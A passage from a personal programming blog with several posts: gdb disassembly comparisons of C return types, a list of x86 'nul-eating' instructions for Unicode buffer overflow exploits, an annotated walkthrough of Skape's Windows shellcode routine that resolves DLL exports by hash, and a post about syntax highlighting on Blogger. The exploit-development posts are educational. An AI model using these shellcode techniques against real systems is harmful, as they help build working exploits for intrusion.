   0x00000000004004f0 <+14>: movsd  xmm0,QWORD PTR [rbp-0x8]
   0x00000000004004f5 <+19>: addsd  xmm0,QWORD PTR [rbp-0x10]
   0x00000000004004fa <+24>: pop    rbp
   0x00000000004004fb <+25>: ret    
End of assembler dump.
(gdb) 

However, as you may have noticed, the instructions are different. For the float datatype movss and addss are used while movsd and addsd are used for double.
The final 's' means "single precision floating point" while the final 'd' means "double precision floating point"...that's the entire difference.
Now, the long long is double the size of an int so a bigger register is needed:

(gdb) disassemble return_longlong
Dump of assembler code for function return_longlong:
   0x00000000004004fc <+0>: push   rbp
   0x00000000004004fd <+1>: mov    rbp,rsp
   0x0000000000400500 <+4>: mov    QWORD PTR [rbp-0x8],rdi
   0x0000000000400504 <+8>: mov    QWORD PTR [rbp-0x10],rsi
   0x0000000000400508 <+12>: mov    rax,QWORD PTR [rbp-0x10]
   0x000000000040050c <+16>: mov    rdx,QWORD PTR [rbp-0x8]
   0x0000000000400510 <+20>: add    rax,rdx
   0x0000000000400513 <+23>: pop    rbp
   0x0000000000400514 <+24>: ret    
End of assembler dump.
(gdb) 

And therefore rax is used, since this is on a 64 bit machine. What would the same C code be compiled into on a 32 bit processor? I tried and got this:

(gdb) disassemble return_longlong 
Dump of assembler code for function return_longlong:
   0x080483b4 <+0>: push   ebp
   0x080483b5 <+1>: mov    ebp,esp
   0x080483b7 <+3>: push   ebx
   0x080483b8 <+4>: sub    esp,0x14
   0x080483bb <+7>: mov    eax,DWORD PTR [ebp+0x8]
   0x080483be <+10>: mov    DWORD PTR [ebp-0x10],eax
   0x080483c1 <+13>: mov    eax,DWORD PTR [ebp+0xc]
   0x080483c4 <+16>: mov    DWORD PTR [ebp-0xc],eax
   0x080483c7 <+19>: mov    eax,DWORD PTR [ebp+0x10]
   0x080483ca <+22>: mov    DWORD PTR [ebp-0x18],eax
   0x080483cd <+25>: mov    eax,DWORD PTR [ebp+0x14]
   0x080483d0 <+28>: mov    DWORD PTR [ebp-0x14],eax
   0x080483d3 <+31>: mov    eax,DWORD PTR [ebp-0x18]
   0x080483d6 <+34>: mov    edx,DWORD PTR [ebp-0x14]
   0x080483d9 <+37>: mov    ecx,DWORD PTR [ebp-0x10]
   0x080483dc <+40>: mov    ebx,DWORD PTR [ebp-0xc]
   0x080483df <+43>: add    eax,ecx
   0x080483e1 <+45>: adc    edx,ebx
   0x080483e3 <+47>: add    esp,0x14
   0x080483e6 <+50>: pop    ebx
   0x080483e7 <+51>: pop    ebp
   0x080483e8 <+52>: ret    
End of assembler dump.
(gdb) 

Quite a bit more code. Tricks are used since long long is 64 bits wide and the 32 bit machine cannot hold this in one register. Instead two registers are used to represent one number. In this case we see that eax is used for containing the bottom half and edx contains the top half.
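
The ADD/ADC pair at the end is the whole trick: add the low halves, then add the high halves plus the carry. A minimal Python sketch of the same arithmetic (the function name is my own):

```python
MASK32 = 0xFFFFFFFF

def add64_on_32bit(a, b):
    """Add two 64-bit values using only 32-bit pieces; returns (edx, eax)."""
    a_lo, a_hi = a & MASK32, (a >> 32) & MASK32
    b_lo, b_hi = b & MASK32, (b >> 32) & MASK32

    low_sum = a_lo + b_lo
    eax = low_sum & MASK32                  # add eax,ecx
    carry = low_sum >> 32                   # the carry flag left by ADD
    edx = (a_hi + b_hi + carry) & MASK32    # adc edx,ebx
    return edx, eax

edx, eax = add64_on_32bit(0x00000001FFFFFFFF, 1)
print(hex(edx), hex(eax))
```

Here the low half overflows, so the carry ends up in the high half that is returned in edx.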

Now, the struct return is interesting:

(gdb) disassemble return_my_struct 
Dump of assembler code for function return_my_struct:
   0x0000000000400515 <+0>: push   rbp
   0x0000000000400516 <+1>: mov    rbp,rsp
   0x0000000000400519 <+4>: mov    QWORD PTR [rbp-0x28],rdi
   0x000000000040051d <+8>: mov    DWORD PTR [rbp-0x2c],esi
   0x0000000000400520 <+11>: mov    DWORD PTR [rbp-0x30],edx
   0x0000000000400523 <+14>: mov    eax,DWORD PTR [rbp-0x2c]
   0x0000000000400526 <+17>: mov    DWORD PTR [rbp-0x20],eax
   0x0000000000400529 <+20>: mov    eax,DWORD PTR [rbp-0x30]
   0x000000000040052c <+23>: mov    DWORD PTR [rbp-0x1c],eax
   0x000000000040052f <+26>: mov    eax,DWORD PTR [rbp-0x30]
   0x0000000000400532 <+29>: mov    edx,DWORD PTR [rbp-0x2c]
   0x0000000000400535 <+32>: add    eax,edx
   0x0000000000400537 <+34>: mov    DWORD PTR [rbp-0x18],eax
   0x000000000040053a <+37>: mov    eax,DWORD PTR [rbp-0x2c]
   0x000000000040053d <+40>: imul   eax,DWORD PTR [rbp-0x30]
   0x0000000000400541 <+44>: mov    DWORD PTR [rbp-0x14],eax
   0x0000000000400544 <+47>: mov    DWORD PTR [rbp-0x10],0x7
   0x000000000040054b <+54>: mov    rax,QWORD PTR [rbp-0x28]
   0x000000000040054f <+58>: mov    rdx,QWORD PTR [rbp-0x20]
   0x0000000000400553 <+62>: mov    QWORD PTR [rax],rdx
   0x0000000000400556 <+65>: mov    rdx,QWORD PTR [rbp-0x18]
   0x000000000040055a <+69>: mov    QWORD PTR [rax+0x8],rdx
   0x000000000040055e <+73>: mov    edx,DWORD PTR [rbp-0x10]
   0x0000000000400561 <+76>: mov    DWORD PTR [rax+0x10],edx
   0x0000000000400564 <+79>: mov    rax,QWORD PTR [rbp-0x28]
   0x0000000000400568 <+83>: pop    rbp
   0x0000000000400569 <+84>: ret    
End of assembler dump.
(gdb)

Here we see that the structure is built on the function's stack frame and then (from address 0x40054b) the local structure is copied out to an address that the caller specifies (passed in rdi). This is quite bad, but what happens if we ask the compiler to optimize (-O3)?
Then we get this:

(gdb) disassemble return_my_struct
Dump of assembler code for function return_my_struct:
   0x0000000000400500 <+0>: lea    ecx,[rsi+rdx*1]
   0x0000000000400503 <+3>: mov    DWORD PTR [rdi],esi
   0x0000000000400505 <+5>: mov    rax,rdi
   0x0000000000400508 <+8>: imul   esi,edx
   0x000000000040050b <+11>: mov    DWORD PTR [rdi+0x4],edx
   0x000000000040050e <+14>: mov    DWORD PTR [rdi+0x10],0x7
   0x0000000000400515 <+21>: mov    DWORD PTR [rdi+0x8],ecx
   0x0000000000400518 <+24>: mov    DWORD PTR [rdi+0xc],esi
   0x000000000040051b <+27>: ret    
End of assembler dump.
(gdb) 

This is much shorter: the fields are written directly through the destination pointer in rdi, with no temporary copy on the stack. This is much better and roughly the same as if the function had taken a pointer to the destination structure explicitly in the C source. Maybe we should not be so worried about letting the compiler do these kinds of optimizations for us...if in doubt, disassemble the result and take a look.
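
For comparison, here is a minimal sketch of the two styles side by side. The struct layout and field names are assumptions inferred from the disassembly (five 32-bit values: the two arguments, their sum, their product and the constant 7), and fill_my_struct is a hypothetical name for the explicit-pointer variant.

```c
#include <assert.h>
#include <stddef.h>

/* Assumed layout: five ints, matching the 20 bytes stored in the disassembly. */
struct my_struct {
    int a;
    int b;
    int sum;
    int product;
    int constant;
};

/* Return by value. On x86-64 System V a struct this large is returned
 * through a hidden destination pointer that the caller passes in rdi. */
struct my_struct return_my_struct(int a, int b)
{
    struct my_struct s;
    s.a = a;
    s.b = b;
    s.sum = a + b;
    s.product = a * b;
    s.constant = 7;
    return s;
}

/* Hypothetical explicit variant: the caller passes the destination itself. */
void fill_my_struct(struct my_struct *out, int a, int b)
{
    assert(out != NULL);
    out->a = a;
    out->b = b;
    out->sum = a + b;
    out->product = a * b;
    out->constant = 7;
}
```

Compiling both with -O3 and disassembling them is an easy way to check whether your compiler really generates the same stores for the two versions.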

Wednesday, July 4, 2012

Unicode exploits

A couple of days ago I finished the Unicode exploitation tutorials from Corelan. You can find the exploits I developed here and here.

In the article Peter Van Eeckhoutte listed some instructions for "eating" added nul bytes, but not all of them.

They are quite useful so I have tried to create a list of them all. The binary format of a unicode nul eating instruction is "00XX00" where XX is a number greater than zero and no greater than 0x7f.
I did the following:

$ for i in {1..127}; do php -r 'echo "\x00\x'$(printf "%x" $i)'\x00";' | ndisasm -b 32 - > $(printf "%x.s" $i); done
$ for file in *; do if [ $(wc -l $file|awk '{print $1}') != "1" ]; then rm -f $file; fi; done

Now each file left in the directory contains a single instruction of the needed format. These are the instructions:

000400            add [eax+eax],al
000C00            add [eax+eax],cl
001400            add [eax+eax],dl
001C00            add [eax+eax],bl
002400            add [eax+eax],ah
002C00            add [eax+eax],ch
003400            add [eax+eax],dh
003C00            add [eax+eax],bh
004000            add [eax+0x0],al
004100            add [ecx+0x0],al
004200            add [edx+0x0],al
004300            add [ebx+0x0],al
004500            add [ebp+0x0],al
004600            add [esi+0x0],al
004700            add [edi+0x0],al
004800            add [eax+0x0],cl
004900            add [ecx+0x0],cl
004A00            add [edx+0x0],cl
004B00            add [ebx+0x0],cl
004D00            add [ebp+0x0],cl
004E00            add [esi+0x0],cl
004F00            add [edi+0x0],cl
005000            add [eax+0x0],dl
005100            add [ecx+0x0],dl
005200            add [edx+0x0],dl
005300            add [ebx+0x0],dl
005500            add [ebp+0x0],dl
005600            add [esi+0x0],dl
005700            add [edi+0x0],dl
005800            add [eax+0x0],bl
005900            add [ecx+0x0],bl
005A00            add [edx+0x0],bl
005B00            add [ebx+0x0],bl
005D00            add [ebp+0x0],bl
005E00            add [esi+0x0],bl
005F00            add [edi+0x0],bl
006000            add [eax+0x0],ah
006100            add [ecx+0x0],ah
006200            add [edx+0x0],ah
006300            add [ebx+0x0],ah
006500            add [ebp+0x0],ah
006600            add [esi+0x0],ah
006700            add [edi+0x0],ah
006800            add [eax+0x0],ch
006900            add [ecx+0x0],ch
006A00            add [edx+0x0],ch
006B00            add [ebx+0x0],ch
006D00            add [ebp+0x0],ch
006E00            add [esi+0x0],ch
006F00            add [edi+0x0],ch
007000            add [eax+0x0],dh
007100            add [ecx+0x0],dh
007200            add [edx+0x0],dh
007300            add [ebx+0x0],dh
007500            add [ebp+0x0],dh
007600            add [esi+0x0],dh
007700            add [edi+0x0],dh
007800            add [eax+0x0],bh
007900            add [ecx+0x0],bh
007A00            add [edx+0x0],bh
007B00            add [ebx+0x0],bh
007D00            add [ebp+0x0],bh
007E00            add [esi+0x0],bh
007F00            add [edi+0x0],bh
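
The same list can be predicted without a disassembler by decoding XX as the ModRM byte of opcode 00 (add r/m8, r8). The following is only a sketch based on my reading of the 32-bit encoding rules, and the function names are hypothetical: the pattern is a single three-byte instruction exactly when the ModRM byte asks for one more byte, either a SIB byte (mod 0, rm 4) or an 8-bit displacement without a SIB byte (mod 1, rm other than 4).

```c
#include <assert.h>

/* Returns 1 if the bytes 00 <modrm> 00 decode as one three-byte
 * instruction in 32-bit mode, 0 otherwise. Valid for 0x01..0x7f only. */
int is_nul_eater(unsigned int modrm)
{
    unsigned int mod = modrm >> 6;  /* 0 or 1 in this range */
    unsigned int rm = modrm & 7;    /* register/memory selector */

    assert(modrm >= 0x01 && modrm <= 0x7f);

    if (mod == 0)
        return rm == 4;  /* SIB byte follows; SIB 0x00 means [eax+eax] */
    return rm != 4;      /* disp8 follows; rm 4 would need a SIB byte as well */
}

/* Counts the qualifying values of XX in 0x01..0x7f. */
int count_nul_eaters(void)
{
    int count = 0;
    unsigned int xx;

    for (xx = 0x01; xx <= 0x7f; xx++) {
        if (is_nul_eater(xx))
            count++;
    }
    return count;
}
```

This agrees with the ndisasm output above: 8 instructions of the [eax+eax] form plus 56 of the [reg+0x0] form, 64 in total.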

I hope these are useful.

Saturday, June 9, 2012

Understanding Windows shellcode 2

Having read and understood Skape's paper on Windows shellcode I thought I'd better provide yet another explanation of how it works. Yesterday I explained finding kernel32.dll so today I will explain Skape's method of resolving symbols inside a dll.

Over at OpenRCE you can find a very useful PDF describing the structure of a PE file but I have drawn a diagram showing only the necessary elements:
Relevant parts of a PE file
All addresses inside the PE file are relative to the base address...they are NOT absolute.

Skape's 'find_function' function takes two arguments: the base address of the dll to search and a hash code of the name to find. Thus the stack upon entering the function looks like this:
Stack layout after having entered the function
The first instruction (pushad) saves all eight general purpose registers (32 bytes in total), after which the stack looks like this:
Stack layout after having executed the 'pushad' instruction

The code begins by saving the registers and finding the export table (IMAGE_EXPORT_DIRECTORY). This is accomplished by the following instructions:

find_function:
pushad                       ;Save registers
mov  ebp, [esp + 0x24]       ;Put first argument (dll base) into ebp
mov  eax, [ebp + 0x3c]       ;Put offset of PE header into eax
mov  edx, [ebp + eax + 0x78] ;Put offset of export directory into edx
add  edx, ebp                ;Offset + base = absolute address

Now EDX contains the absolute address in memory of the IMAGE_EXPORT_DIRECTORY structure.
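
The two lookups above can be sketched in C as follows. This is only an illustration: the function names are hypothetical, the image is assumed to be a 32-bit PE already mapped in memory, and like the shellcode it does no bounds checking.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Read a little-endian 32-bit value byte by byte (no alignment assumptions). */
static uint32_t read_u32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns the offset (relative to base) of the export directory. */
uint32_t export_directory_offset(const uint8_t *base)
{
    uint32_t pe_offset;

    assert(base != NULL);
    pe_offset = read_u32le(base + 0x3c);         /* mov eax, [ebp + 0x3c] */
    return read_u32le(base + pe_offset + 0x78);  /* mov edx, [ebp + eax + 0x78] */
}
```

Adding the returned offset to the base address gives the absolute address, which is what the 'add edx, ebp' instruction does.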
Next the number of names is put into ECX and the address of the names address table into EBX:

mov   ecx, [edx + 0x18]  ;Number of names
mov   ebx, [edx + 0x20]  ;Offset of names table
add   ebx, ebp           ;Adding EBP makes address absolute

Now ECX contains the number of exported names and EBX contains the address of the array of name offsets. Now we enter a loop which iterates backward through all exported names, hashing each name and comparing it to the requested value.

A C version of the hashing algorithm would look like this:

#define ROR(v,n) (((v)>>((n)%32))|((v)<<(32-((n)%32))))
const char * name = "LoadLibraryA";
unsigned int hash = 0;
while (*name) {
    /* lodsb loads an unsigned byte, so avoid sign extension of char */
    hash = ROR(hash, 13) + (unsigned char)*name;
    name++;
}
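
Wrapped up as a function it could look like the sketch below. The names ror32 and ror13_hash are my own and not taken from Skape's paper.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Rotate a 32-bit value right by n bits. */
static uint32_t ror32(uint32_t v, unsigned int n)
{
    n &= 31;
    return n ? (v >> n) | (v << (32 - n)) : v;
}

/* Hash a NUL-terminated name: rotate right 13 bits, then add the character. */
uint32_t ror13_hash(const char *name)
{
    uint32_t hash = 0;

    assert(name != NULL);
    while (*name) {
        hash = ror32(hash, 13) + (unsigned char)*name;
        name++;
    }
    return hash;
}
```

Calling ror13_hash("LoadLibraryA") gives 0xec0e4e8e, which is the value you push as the second argument when you want find_function to look up LoadLibraryA.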

The code goes like this:

find_function_loop:
jecxz find_function_finished ;No more names, go to end
dec   ecx                    ;Decrement ECX
mov   esi, [ebx + ecx * 4]   ;Offset of next exported name
add   esi, ebp               ;Make it absolute

compute_hash:
xor   edi, edi               ;EDI will contain calculated hash
xor   eax, eax               ;AL will contain character...zero top bits
cld                          ;Make lodsb increment esi

compute_hash_again:
lodsb                        ;Put char at ESI into AL and increment ESI
test  al, al                 ;Reached end of string ?
jz    compute_hash_finished  ;Yes we did
                             ;End hashing and start comparing
ror   edi, 0xd               ;Rotate right 13 bits
add   edi, eax               ;Add character
jmp   compute_hash_again     ;Again with next character

compute_hash_finished:
cmp   edi, [esp + 0x28]      ;Compare computed hash with second arg
jnz   find_function_loop     ;Not equal...try next name

mov   ebx, [edx + 0x24]      ;Found! Put offset of ordinals into EBX
add   ebx, ebp               ;Make it absolute
mov   cx, [ebx + 2 * ecx]    ;Put ordinal in CX
                             ;ECX contains index of name which
                             ;corresponds to the index into the ordinal
                             ;table. Each ordinal is two bytes long

mov   ebx, [edx + 0x1c]      ;Put offset of function table into EBX
add   ebx, ebp               ;Make it absolute
mov   eax, [ebx + 4 * ecx]   ;Use ordinal as index into function table
                             ;and put offset of function into EAX
add   eax, ebp               ;Make it absolute

mov   [esp + 0x1c], eax      ;Overwrite the saved EAX register
                             ;with the found address

find_function_finished:
popad                        ;Restore registers
ret                          ;Return with EAX=absolute address of function
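
To make the name -> ordinal -> function chain easier to follow, here is a rough C model of the same lookup. It is a sketch under simplifying assumptions: the export_view struct is hypothetical and uses plain C arrays instead of offsets into a real PE image, and it returns 0 when nothing matches, whereas the assembly simply leaves the caller's EAX untouched.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, simplified view of the three export tables. */
struct export_view {
    uint32_t number_of_names;   /* field at 0x18 */
    const char *const *names;   /* stands in for the name offsets (0x20) */
    const uint16_t *ordinals;   /* ordinal table (0x24) */
    const uint32_t *functions;  /* function offsets (0x1c) */
};

/* Same hash as above: rotate right 13 bits, then add the character. */
static uint32_t ror13_hash(const char *name)
{
    uint32_t hash = 0;

    while (*name) {
        hash = ((hash >> 13) | (hash << 19)) + (unsigned char)*name;
        name++;
    }
    return hash;
}

/* Returns the function offset for the name with the wanted hash, or 0. */
uint32_t find_function_offset(const struct export_view *ex, uint32_t wanted)
{
    uint32_t i;

    assert(ex != NULL);
    i = ex->number_of_names;
    while (i != 0) {                             /* jecxz find_function_finished */
        i--;                                     /* dec ecx */
        if (ror13_hash(ex->names[i]) == wanted)  /* cmp edi, [esp + 0x28] */
            return ex->functions[ex->ordinals[i]];
    }
    return 0;
}
```

In the real code the caller still has to add the dll base to the returned offset, which is what the final 'add eax, ebp' does.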

The code is pretty clear when you can visualize the structures. With these two shellcodes you can build more or less anything since you can load any library on the target machine and utilize its functionality.

Enjoy

Wednesday, June 6, 2012

First post

So...my first blog post.

I had hoped to write about how awesome I am or some cool project I am working on, but no. All my projects need code which needs syntax highlighting and I cannot seem to get it working so instead I will write about how badly I am failing at making this work.

So, a code blog needs syntax highlighting and a Google query showed me that SyntaxHighlighter by Alex Gorbatchev is the way to go. It is using JavaScript/HTML and CSS for highlighting on the client so no server side code is needed. Cool.

And there are even lots of integration guides telling you how to make it work on many different blogging sites and CMSes so what can go wrong?

Well I succeeded in doing something wrong...it ain't working.

Blogger has disabled the 'Edit HTML' button for editing the template for some reason. Another quick Google search offered me the solution, so I have added the CSS links and JavaScript source files that the many guides told me to.

So I added a first (now deleted) blog post with some testing code:

<pre class="brush:c">
#include <stdio.h>

int main(int argc, const char * argv[]) {
    printf("Hello, World!\n");
    return 0;
}
</pre>

But for some reason it didn't work. The code was just shown plain, simple and boring as with a normal <pre>. Why?

Viewing the source revealed that the scripts were in place. Pressing F12 in Google Chrome showed me that the files were in fact downloaded. A breakpoint on the JavaScript showed me that the code was run and the debugger tells me that no exceptions are thrown and everything is just fine. So why wasn't it working?

Well...apparently Blogger uses Ajax for retrieving the blog post text and then inserts it into the page. This happens AFTER the JavaScript has run so of course SyntaxHighlighter cannot format my code. It isn't there yet!

I pressed F12 again and ran 'SyntaxHighlighter.all();' from the console. Nothing happened!

Maybe SyntaxHighlighter doesn't like being called twice so I commented out the 'SyntaxHighlighter.all();' call from the template and ran it again manually. Still nothing!

Maybe there is an error in SyntaxHighlighter, so I created a static test page on my machine which loads all the files and contains a code snippet. To my dismay it looked fine and well highlighted.

This is where I am now. Failing!
Or maybe Blogger is...I really cannot tell but life must go on so I archive this issue in my "technical debt" tray for later. Code snippets will look like crap until I (or someone else) resolve this issue.

So much for looking cool in my first post.